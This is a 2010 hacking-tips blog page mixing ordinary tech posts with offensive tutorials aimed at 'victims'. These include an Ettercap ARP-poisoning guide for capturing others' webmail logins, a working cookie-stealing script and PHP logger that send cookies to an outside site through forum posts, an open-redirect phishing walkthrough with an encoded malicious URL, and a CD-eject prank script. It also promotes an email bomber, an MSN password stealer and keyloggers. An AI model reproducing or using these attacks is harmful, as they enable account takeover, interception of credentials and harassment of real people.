NETRDX BLOG : Just Anthing To Everything: 08/27/10

Friday, August 27, 2010

Blackberry software-repair

Supported Models:

blackberry from 5500 to 9530

DOWNLOAD

Sniffing Tutorial

Hi, Today I am posting a tutorial on Sniffing which can be done using “BACKTRACK” . You can download Backtrack from here.

I prefer using Backtrack 3.0 Final version.

Well lets start with sniffing. If you don’t know what sniffing is, then click here.

Tools you need are:

Ettercap
nano

1. For SSL Dissection support (hotmail,gmail), you need to do this:

Open a shell, type: “nano /usr/local/etc/etter.conf”, use the down arrow until you reach “redir_command_on/off”, look at the linux part, your gonna need to uncomment:

Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"to:

Code:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

after your done, press F2, Y, Return.
Now boot Ettercap: Menu –> Backtrack –> Spoofing –> Ettercap
Go to: Sniff –> Unified Sniffing –>ethX(what interface you want to sniff).
Then Press: Ctrl+S to scan hosts.
Then Go to: Mitm –> ARP poisoning, select sniff remote connections, and press ok.
Then Go to: Start –> Start Sniffing.

For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

When your done, go to Start –> Stop Sniffing, And go to Mitm –> Stop mitm attack(s)

CD Drive Trick !!!

This trick enable you to make a persons CD Drive open it when the victim tries to close it . When the persons opens it it closes automatically and this keeps on repeating till the person finnaly restarts. So i think this one will be a teaser for your friends….

Right click on desktop and go to new and then new text document then copy and paste this in that file:

do
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection

if colCDROMS.Count >= 1 then
For i = 0 to colCDROMS.Count – 1
colCDROMS.Item(i).Eject
Next ‘ cdrom
End if
Loop

Save this file as cdrom.vbs in save as. Then open the file and then the cd rom will not close itself. To stop this from happening you have to restart your computer

ways to find IP of mail senders

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The Tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

First of all, the IP address is generally found in the headers enclosed between square brackets, for instance, [129.130.1.1]

Finding IP address in Gmail

* Log into your Gmail account with your username and password.
* Open the mail.
* To display the email headers,
* Click on the inverted triangle beside Reply. Select Show Original.
* Manually find the IP address, proceed to 5.
* Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

* If you find more than one Received: from patterns, select the last one.
* Track the IP address of the sender

Finding IP address in Yahoo! Mail

* Log into your Yahoo! mail with your username and password.
* Click on Inbox or whichever folder you have stored your mail.
* Open the mail.
* If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail

* You should see similar headers like above

Or if you want to manually find the IP address, proceed to 6.

* Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender.

If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.

* Track the IP addess of sender

Finding IP address in Hotmail

* Log into your Hotmail account with your username and password.
* Click on the Mail tab on the top.
* Open the mail.
* If you do not see the headers above the mail message, your headers are not displayed. To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked

* Click on Ok button
* Go back to the mails and open that mail

* You should see the email headers now.
* Manually find the IP address, proceed to 7.
* If you find a header with X-Originating-IP: followed by an IP address, that is the senders IP address

Hotmail headers

In this case the IP address of the sender is [68.34.60.59].

* If you find a header with Received: from followed by a Gmail proxy like this

Hotmail headers
Look for Received: from followed by IP address within square brackets[]
In this case, the IP address of the sender is [69.140.7.58].

* Or else if you have headers like this

Hotmail headers

Look for Received: from followed by IP address within square brackets[].

In this case, the IP address of the sender is [61.83.145.129] (Spam mail).

* If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
* Track the IP address of the sender

Watch the HISTORY of your computer

You can almost do anything with a keylogger .Like these :

1.Get others password no matter which domain or messenger untill it is being typed on your computer
2.For safety purposes,like to monitor what children are doing on the computer
3.For seeing what others and doing on the computer

These are the stuff that a keylogger does .

This keylogger is basically a monitoring software that helps in protection or safety and what not

This picture is of the keylogger refog : ( Download Here)

Hiding Files in JPEG

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

Ok, lets begin…
1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden – RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) – Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive…

This hack will allow you to hide files in jpegs’s without software installed

Disable Writing to USB Drives

A common security concern at organizations is allowing users to plug in a usb flash drive, because they could so easily copy corporate data.Since Windows XP SP2, you can disable writing to USB devices altogether using a simple registry hack.however one should also note that if you are using this trick, you should make sure that the users are not administrators on the computer, because they could easily change this setting back.

Here it is
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
“WriteProtect”=dword:00000001

Paste the code into a notepad file,and then save it as a registry file.Double click it and voila,you have successfully prevented the write access to the USB drive.

Once you have double clicked the registry, you will have to reboot for the changes to take effect.
This works on Vista as well. Here’s the window you’ll get when you try and write to a USB drive:
Disable Writing to USB Drives
If you want to enable the write access again,then copy this code and paste the code into a notepad file,and then save it as a registry file.Double click it and write access will be enabled again.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
“WriteProtect”=dword:00000000′

Stay tuned for more tips and hacks.

Rename Multiple Files on XP

XP lets you rename files in bulk by simply selecting multiple files within Windows Explorer and pressing the F2 key. When you use this feature, the OS applies the name you enter to the first file and applies the same name with a number in parentheses to the other files you selected (the file extensions remain unchanged).

For example, if you select the following files,

1.notes.doc
2.figures.xls
3.disney.jpg
4.holiday.gif

and rename the first file (notes.doc) to SoD.doc, XP renames the remaining files as follows:

1.SoD (1).xls
2.SoD (2).jpg
3.SoD(3).gif

How to steal a remote computer's Cookies to hack ids

Hey,with this cookie logging trick you hack hack anyone’s account at any point of time you just have to do one thing,you gotto send send him to a link which has the potential to log cookies.To fast…… huh ?Ok lets go one by one.

Here’s what to do

1.First you have to create a file which can capture a person’s cookie.So follow the following process.

a.Copy the code which is given below .

<script>location.href=’http://www.hackosys.blogspot.com/cookielogger.php?cookie=’+escape(document.cookie)</SCRIPT>

b.Now you have to change “http://hackosys.blogspot.com” to your your site.
c.Remember one thing you should not upload the files into a directory.
d.Now open notepad and paste the script in it and save it as fun.gif

2.Ok,now you gotto create a key logger which can store the captured cookie file and the script is given below.This is a .php script (quite simple huh ?)

<?php
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

a.Now just save this as “cookielogger.php” .Do not edit anything.

3.Now you just have to create a plane empty text document and save it as logfile.txt
4.Now you are ready with the cookie stealing process.Now you have to get registered with a free webhosting site such as www.110mb.com or www.t35.com with supports .php file hosting.
5.After you have done this you have 75% finished it.Now upload the files (not into a directory) and save it .You gotto upload it like this

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
6.Now test it by placing it in a forum and insert this code in the signature or a post or where you can Smile !OR else you can just blindly use this in you forum by replacing the ones in red with your website URL.

[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif
7.So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
8.And something like this will be stored in your “logfile.txt”
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

9.If you want to know how to use it you gotto download the firefox addon and with this you can finish the job neatly
Thats it !

EmailBomber:Spam your Victim's inbox to 15 million !

Ok,My poll shows that a majority of people are interested in hacking..So here is one more post regarding screwing your friends/Victim’s Computer.What I’m about to show is an “Email-Bomber” ie. it sends a particular message to your victim nearly 15 million time or even more.As long as his inbox is not full it keeps spamming your victim’s inbox.

The basic requirements for this program is that you need .NET FrameWork 2 or above
First of all download the software Email Spammer

How to use it ?

Fill up all the information .It is better to use a fake Gmail account just to prevent your email from being hacked by the programmer ! So “SMTP” Server in this case would be “smtp.gmail.com” or else if you use a “Live account” then you can opt “smtp.live.com” .Then just fill up your victim’s info and then you are done !

So now after you have filled all the necessary info you will see a list of spammed mails from you.You can check out this screenshot !

Use this tool just for educational purposes guys !Please don’t get yourself into trouble cause i hold no responsibility for this !

How to Find Windows XP CD Key inside CD ?

was just Right Under you Nose. Lets see how easily you can get it…

Find Windows XP CD key inside your Windows XP CD

To get the Windows XP CD key, you have to do the following steps. Just follow the following steps and find Windows XP cd key into your windows XP CD.

Steps to follow to find Windows XP CD key:

1.Bring your Windows XP CD and insert it into your computer’s CD/DVD ROM/ RAM.
2.Now, browse your Windows XP CD and find the folder I386.
3.Inside I386 folder, find the file named as unattended.txt.
4.Open unattended.txt by using notepad.
5.At last, keep scrolling of the opened file and you will get Windows XP CD key

How To Remove Advertisements From Orkut Pages

Orkut is one of the popular social networking sites in India as well as in Brazil. Advertisements are the only way for Google to keep Orkut running. From the past few weeks, you may have noticed that Orkut has started showing ads on top of the pages. Earlier it was used to show ads below friend’s bar. That was somewhat avoidable but now it looks too ugly.

Have a look at the screenshot below :

If you are a Firefox user, you can easily remove these annoying ads. Install Orkut and MySpace Advertising Remover to Firefox and restart your browser. That’s it. Now you can chat with your friends on Orkut without those annoying ads .

Links : Orkut and MySpace Advertising Remover

Add Any Application To Right Click Menu Of Folders

Playing with registry is one of my hobby. Today I am going to explain you a nice way to add any application to the right click menu of folders in Windows by editing registry. It might be useful for you as you can open your most frequently used applications just by right clicking on folders. So lets start.

I will add Notepad to right click menu of folders here. You can add any other application that you use most frequently using this method.

1.First of all open registry editor. To open registry editor press Ctrl+R. Now type regedit in RUN window and press enter.

2.Now go to HKEY_LOCAL_MACHINE -> SOFTWARE -> Classes -> Folder -> shell.

3.Right click on shell and make a new Key. You can name it anything. I will name it as notepad.

4.Now right click on newly created key (notepad) and create a new key value again and name it as command.

5.Under command key value craete a new String Value by right clicking anywhere under commend key.

6.Double click on new String Value and change its Value data. If you want to make shortcut to notepad then its Value data will be – C:\Windows\System32\notepad.exe

7.Close the registry editor. Now right click on any folder to see the changes

MSN Password Hacker Software | Recover/Hack Windows Live Messenger Account Password

Hey guys, I found this hacking trick to hack Windows live messenger account password and was amazed about how easy hacking Windows live messenger password has become. In my article Real email hacking software , I have written about reality of msn windows live messenger hacking software. In this article, I will inform you about MSN Messenger account password hacking software- “MSN Password Hacker”. I have provided link for software download… just read on.

How does MSN Password Hacker works ???

MSN Password Hacker scans your computer for locally stored MSN account passwords and thus you can hack your msn account password. But, remember, for this msn hacking software to work, there must be locally stored msn passwords on victim computer.

Steps to Use MSN Password Hacker:

1. Download MSN password hacker software.
2. Unzip the downloaded folder using Winzix (free download here) to obtain msn password hacker.
3. Run WLMPasswords.exe application. No installation is required for this.
4. In the text field next to “Filter”, type in the Windows live messenger email address to be hacked and hit Check.
5. After this, MSN password hacker will scan computer for msn password.
6. And then, you will get MSN account password in plain “text format”. Thus, windows live messenger account hacked !!!

Now, how do you hack friend’s msn windows live messenger account password. Simply, run the msn hacking program on victim computer with his windows live messenger email id in Filter and hit check. Thus, MSN Password hacker will give you msn windows live messenger password and you will be able to hack his windows live messenger account…cheers.

Note: For this msn hacking software- MSN password hacker to work, you should have .NET Framework version 2.0 and windows live messenger installed.

Shutdown your PC remotely using Twitter and TweetMyPC

Twitter is powerful and simple indeed. But then developers were not stopping on creating and obviously developing new applications to make it even stronger. TweetMyPC is a freeware application which enables you to utilize Twitter as way of sending commands to your PC remotely.

Sending commands to your PC remotely sounds very cool. But the negative thing here is that TweetMyPC only provides Shutdown, restart, and log off commands for now.

Though, it is still a very good application. So, to start things up, it’s recommended to create a separate Twitter account for this one. Then download and install TweetMyPC on your computer. Login your Twitter account on TweetMyPC and you’re on the go. Just tweet the command and TweetMyPC will do it for you. Very simple.

Available Commands:

■Shutdown
■Restart
■Logoff

Download TweetMyPC here

Install Windows From Usb Drive

Windows 7 can run on machines with lower specs than required for Windows Vista, and many users are actually finding it runs better than Windows XP on lower spec machines. It’s also ideal to run on newer netbook machines, but unfortunately many of these do not include a DVD drive so how do you install windows 7 on a machine without a DVD drive?

I spent yesterday researching this exact problem and I managed to install Windows 7 on my LG X110 netbook in around 20 minutes using a 4GB USB Drive. Setting up the USB drive to install Windows 7 was fairly easy in the end, and the installation was quicker than a DVD drive, so this method is perfect if you want to install Windows 7 quickly on several machines.

How To Install Windows 7 From A USB Drive

1.Find a standard 4GB USB Drive and plug it into your machine
2.Click Start in your enter ‘cmd’ in the run field. Once cmd is open type in ‘diskpart’ and a new window will open
3.In the new diskpart window type:

■‘list disk’ : This lists all the disk drives attached to your machine

■Look for your USB drive and note the number and then type: ’select disk #’, where ‘#’ is your USB disk number
■then type ‘clean’
■then type ‘create partition primary’
■then ’select partition 1′
■then ‘active’
■then ‘format fs=fat32 quick’

Once you’ve finished these steps you then need to copy your Windows 7 files to the USB. To do this you have to mount your Windows 7 ISO as a virtual DVD. Doing this is easy:

1.Install MagicDisk (free)
2.once installed, right-click on MagicDisk in your system tray Click on ‘Virtual CD/DVD-Rom’, select your DVD drive
3.then ‘Mount’ and in the dialog window that opens up, select your Windows 7 ISO
4.Now in windows Explorer, click on your DVD drive and you should see all the Windows 7 Files. All you have to do now is copy and paste all the files to your USB key and you have a Windows 7 USB Installation Stick!
5.Install the stick in the PC you want to install Windows 7 on and boot up. Remember to change your bios to allow booting from USB

If you follow the steps above then you should have no problems installing Windows 7 from a USB key

How to Download Videos From MegaVideo for Free

Hello Friends, As all of you know about MegaVideo, MegaVideo is a video sharing website run by the creators of Megaupload based in Hong Kong. MegaVideo is one of the 100 most visited website in the world. MegaVideo has various types of online video in its database but MegaVideo is not provide any facility to download videos for free users (means only premium members or membership user can download videos from MegaVideo) but here i am giving you one trick by which you can download videos from MegaVideo very easily. To download videos from MegaVideo you mast have Internet Explorer. Now follow the steps shown below to download video from MegaVideo:

1. Open MegaVideo Link in Internet Explorer.
2. After open MegaVideo Link Internet Explorer click on Play button or arrow to play video.
3. Now you can see video is start buffering, now click on stop button. When you click on stop video will continue its buffering so please wait untill all buffering is complete.
4. Once all buffering is completed Go to Tools->Internet Options in Internet Explorer.
5. After that Click on Settings in Temporary Intenet Files section.
6. After click on settings you will see one button “View Files” in dialogue box. Click on View Files.
7. When you click on View Files one window will open which have so mamy files of all extensions, But you will see also one file which have big in size and also don’t have any extension and have big file name, Just copy this file and paste it wherever you want. This is your downloaded video from MegaVideo.

In this way you can download videos from MegaVideo. If you are getting any problem in this trick then comment your problem.

Download Files from ZShare, Mediafire, HotFile, 4Shared, Easy-Share with RDesc Downloader

Rapidshare and Megaupload are two of the biggest file hosting sites available today. But we should not forget that there are a lots of other file sharing and hosting sites available that we use to download files. I have previously posted Rapidshare unlimited files downloader and 4 rapidshare Premium Link Generators. But here is the downloader tool to download unlimited files from sites like HotFile, MediaFire, 4Shared, ZShare, Easy-Share etc and it’s RDesc downloader. Using RDesc file downloader, you can download multiple and unlimited files from a lots of file sharing sites.

Key Features of RDesc Downloader

■Download unlimited files from several file hosting sites
■Grab all download links from a web page and queue them for download using bulk link adding feature
■Automatic router reconnection to generate new IP addresses to bypass download limits
■Bypass captcha (word verification) processes
■Complete download details and log file
■Download progress bar with estimated time details

RDesc file downloader is available in Spanish language only, but it’s easy interface will make it easy to use even if you don’t know Spanish language. You need to have Microsoft Framework 3.5 installed on your system in order to use this.

Now you don’t have to wait for more time to download files. Bypass captcha settings and download multiple files from ZShare, MediaFire, HotFile, Easy-Share and 4Shared at a time by resetting and auto generating IP address.

Download RDesc file downloader [via]

How to fool your friends when they call by saying “The Number Does not VALID”

Today i am going to show you How can we fool our friends when they call to our mobile by saying the message “The Number Doesnot VALID” or some other message based on your service provider.

Some times we don’t want to talk with a particular person so is there any way to avoid those Friends? May be you do this Tricks i,e Switch off our mobile number or Just giving some one to talk when they call and some other But this tricks all can be guessed by him. So what to do to avoid him?

So, Today i am going to give you one best Trick to avoid him by saying “The Number Doesnot VALID” when ever they call.

Steps to make to get message “The Number Doesnot VALID” whenever they call :
■This tricks is possible only for mobile users :
■Go to Call Divert option and Divert call to your Friend number to the whom you want to avoid.
For ex:If you want to avoid a person with +91944xxxxxx7 then divert Divert Call to +91944xxxxxx7
■Then see the magic whenever they call they get an error announcement saying “The Number Doesnot VALID”

Don’t forget to cancel Call Divert after cheating him otherwise all your incoming call goes to him and outgoing charges apply for you whenever they receive your call.
Enjoy your time by Avoid Talking.

How do I Check the Real Link of a Shortened URL?

URL Shortening is a trend in today’s social media and web surfing. Big giants such as Google and YouTube have their own URL shorteners, too. It’s not just because the URL

shortening is a trend of the present, but also it’s important for tiny conversations like twitter or facebook status.
The trend, URL Shortening, was founded by Tinyurl.com at first and spread widely by twitter. Because you’re limited by how many characters you can use in your conversation, you need everything short but right. That’s why URL Shortening is important and popular at the same time.
Tinyurl.com has an option to preview the shortened link before you visit the site. If you include a word, preview, before the domain tinyurl.com, you will see where the link goes. But what about other shorteners?
Well, you can easily check the link before you have a go to any shortened URL by this firefox plugin. But sometimes you just don’t want to restart your firefox and want a quicker way to do this.

Here comes what exactly you need.
Sucuri has got a nice little web-based tool to let you see the destination of a shortened URL. Not only that, the tool will also check the destination URL in two different ways to find out if it’s safe for you to have a go to the site

It’s advised to check the destination of a shortened link before you decide to have a visit.
Conclusion

I strongly recommend checking out the real URL behind a shortened one before you click on the link, even if one of your friends tweeted this. Twitter is often harmful for these kinds of shortened URLs that may cause damage to your PC or leave spyware program to your computer. As a result, checking the real URL is important for safe surfing. Also, for the sake of your computer’s safety, you need to make sure that the website you are about to visit is declared safe. Use the tool to know if it is

Exploiting Redirect Vulnerabilities

Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.

So first things first. What is a redirect vulnerability? A redirect vulnerability is when a webpage uses a script to redirect you to somewhere (usually another page on the website), but they write that script in such a way that it allows a hacker to manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to webpage that has this url:
Code:

http://www.example.com/login.php?dest=members/index.html

Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.phpscript to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know aboutredirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how thescript responds. For instance:
Code:

http://www.example.com/login.php?dest=http://www.google.com

If this page is vulnerable to redirect vulnerabilities, this it should send us to google after we log in. If not, it will generate some sort of error condition and take you to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know it’s vulnerable toredirect vulnerabilities.
Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url
Code:

www.sys.myschool.com/login.php?service=

where the service parameter points to the address of the service being accessed, as demonstrated in the following urls

Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php

or
http://www.portal.myschool.com/login.php?service=sys/courseInfo.php

Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not aphishing page. A hacker is aware of this, and realizing that this advice will give the you and the other students a false sense of security when you’re on pages that are actual school pages, set out looking for a way to get students to access hisphishing page from within the school login system itself. He sees the above urls and recognizes their potential to be vulnerable to redirect exploitation and creates a phishing page that looks exactly like your school’s page that is displayed to you when your login fails. Being a phishing page, it sends him all the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then become redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:
Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php

However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexidecimal representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:
Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%6 ?5%50%61%67%65%2e%70%68%70

This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.

Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.

Blogger Post Editor Keyboard Shortcuts

After writing a post on Windows Live Writer keyboard shortcuts I moved towards Blogger Editor. I tried many combinations of keyboard shortcuts but only few shortcuts could work properly with the latest browsers like Mozilla and Chrome. However some shortcuts are still not applicable to the latest versions of Firefox and Chrome but they work with old browsers like Internet Explorer 5.5+.

Note:- Shortcuts with red font do not work with Firefox or any other latest browser.

The Complete List Of Keyboard Shortcuts for Blogger Editor

Keyboard Shortcuts Function
CTRL + Z                   To Undo
CTRL + X                   To Cut
CTRL + C                    To Copy
CTRL + V                    To Paste
CTRL + B                     To Bold
CTRL + A                     To Highlight all the text
CTRL + S                      To Auto Save and Keep editing
CTRL + D                     To Save as Draft
CTRL + F                      To Find a Word or Phrase
CTRL + G                      Indic Transliteration
CTRL + Y                      To Redo
CTRL + U                      To Underline
CTRL + I                        Change To Italic
CTRL + P                       To Publish the post
CTRL + SHIFT + P To    Preview the post
CTRL + SHIFT + A To   Insert Hyperlink

If you know any shortcut that I haven't shared yet then kindly share it with all of us in the comments. Hope this may help you in saving time while editing posts and in making your blogging experience more enjoying!

Avira AntiVir Mobilev6.39 S60v2

Advantages

* Reliable protection against viruses that attack your mobile terminal. In this way you cannot infect yourself or pass on infections to others
* Proven, multi-award-winning AntiVir virus and malware protection technology with an extremely high degree of protection, specially designed for use in mobile terminals
* Support of current conventional mobile phone models
* Minimum RAM load due to slim program package
* Fast, resource-saving update through single file update
* All licenses incl. free updates, upgrades and 30 day installation support

Functions

Simple installation and updates within seconds:

* Transmission of the program package by docking onto the local PC (PDA) or via Bluetooth, IrDA, GPRS or serial cable (smartphone).
* Automatic installation of the English or German version – depending on the language set (smartphone).
* Simple manual program update via LAN, WLAN or dial-up (PDA) or via Bluetooth, GPRS/GPS or WLAN (smartphone). Update also possible via host PC.
* Roll-back in case an update could not be carried out completely.
* Automatic scan-on-sync protection (PDA) for secure data synchronization

Individual setting possibilities and transparent status information:

* Clear menu navigation that does not set any riddles.
* Flexibility through definition of the scanning scope.
* Optional scanning of ROM files and/or cards and network folders
* Automatic or interactive procedure in the event of a virus detection).
* Possibility to delete infected files.
* Specific information on every virus detection, so that you are always in the picture. Version information can be requested at any time

Compatible devices

Nokia N-Gage QD, N-Gage, Nokia 3660, 3620, 6600, 7650, 6670, 3230, 6260, 6620, 6630, 6680, 6681, 6682
Panasonic X700
Siemens SX 1
Sendo X and X2
Nokia Communicator 9300 and Communicator 9500
DOWNLOAD

Dark Glamour

Asphalt 5 v1.2.6 iPhone iPod Touch [54MB Compressed!]

Sharper physics allowing for smoother driving thanks to the gyroscope. Crisp, gorgeous high-resolution graphics to take full advantage of the iPhone 4 Retina Display. Support for iOS 4 multitasking on compatible devices: Switch between your favorite apps instantly. Get in, start up and punch it in the fastest dream cars ever created by some of the most prestigious manufacturers in the world.

Features:
•There’s a dream car for you
Take a ride in over 30 of the fastest, most prestigious cars you’ve ever dreamed, from manufacturers like Ferrari, Lamborghini, Audi and Ducati.
•The world is your racetrack
Highly polished HD graphics let you see every detail and animation of the track as you speed over snow, mud, dirt and more in 12 beautiful locations around the world including St. Tropez, Aspen and Las Vegas. Discover hidden shortcuts and jump off ramps!
•New ways to play
Challenge yourself to 8 different racing events including Drift Contest, Cop Chase, Time Attack, Duel Mode, Last Man Standing and Escape.
•Ride with the pack
Six-player Bluetooth and Online Multiplayer lets you compete against friends and anyone around the world in tournaments and join the Asphalt Academy on asphalt-5.com. Speed your way to the top of the online leaderboard!
•The sound of speed
Tune your car radio to play your favorite songs stored on your iPhone/iPod touch during the race and let the music move you.

Download: 52.2Mb
DOWNLOAD

Nokia 5730 Xpressmusic - keypad LED backlight problem

This repair solution can be used to solve Keypad LED backlights problem on Nokia 5730 xpressmusic.
In Nokia 5730 there are two LED driver IC that controls the voltage and current to the keypads LED backlight. The first LED driver on the left side controls and managed the four LED's on the keypads while the other one the right side holds and control only two LED's

Nokia 5730 Xpressmusic keypad LED backlight problem
The repair solution picture above may help to easily determine which LED driver IC seems to be damaged by identifying which LED driver holds and control that particular LED backlight that does not light up.
Check the LED backlight first before doing anything further.
If the four LED's on left is not working, you may check or replace the left side LED driver IC, same also when the two LED's on the right stop working you may check also the LED driver IC on the right side.
Just analyze and observe carefully how the LED backlight driver IC works.
Check the connection of the LED driver IC's ball terminals, including which signal or which particular line it is being connected with.Check the power supply voltage, which is connected direct to the battery VBAT voltage range range 3.7 volts. Trace and check all the lines, then apply jumper wire when found cut or open.

Sitemap

NETRDX BLOG : Just Anthing To Everything